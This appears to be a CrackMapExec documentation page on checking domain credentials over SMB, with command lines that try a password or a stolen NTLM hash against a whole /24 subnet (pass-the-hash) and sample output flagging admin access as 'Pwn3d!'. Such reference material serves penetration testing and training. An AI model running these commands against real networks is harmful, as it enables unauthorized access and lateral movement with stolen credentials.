Checking Credentials (Domain)

Authentication
Failed logins result in a [-]
Successful logins result in a [+] Domain\Username:Password
Local admin access results in a (Pwn3d!) added after the login confirmation, shown below.
1
    SMB         192.168.1.101    445    HOSTNAME          [+] DOMAIN\Username:Password (Pwn3d!)
Copied!
The following checks will attempt authentication to the entire /24 though a single target may also be used.
User/Password
1
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'
Copied!
User/Hash
After obtaining credentials such as
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::
you can use both the full hash or just the nt hash (second half)
1
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
2
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
3
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
4
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
Copied!

SMB protocol - Previous

Authentication

Checking credentials (Local)

Last modified 2yr ago

Copy link

Contents

Authentication

User/Password

User/Hash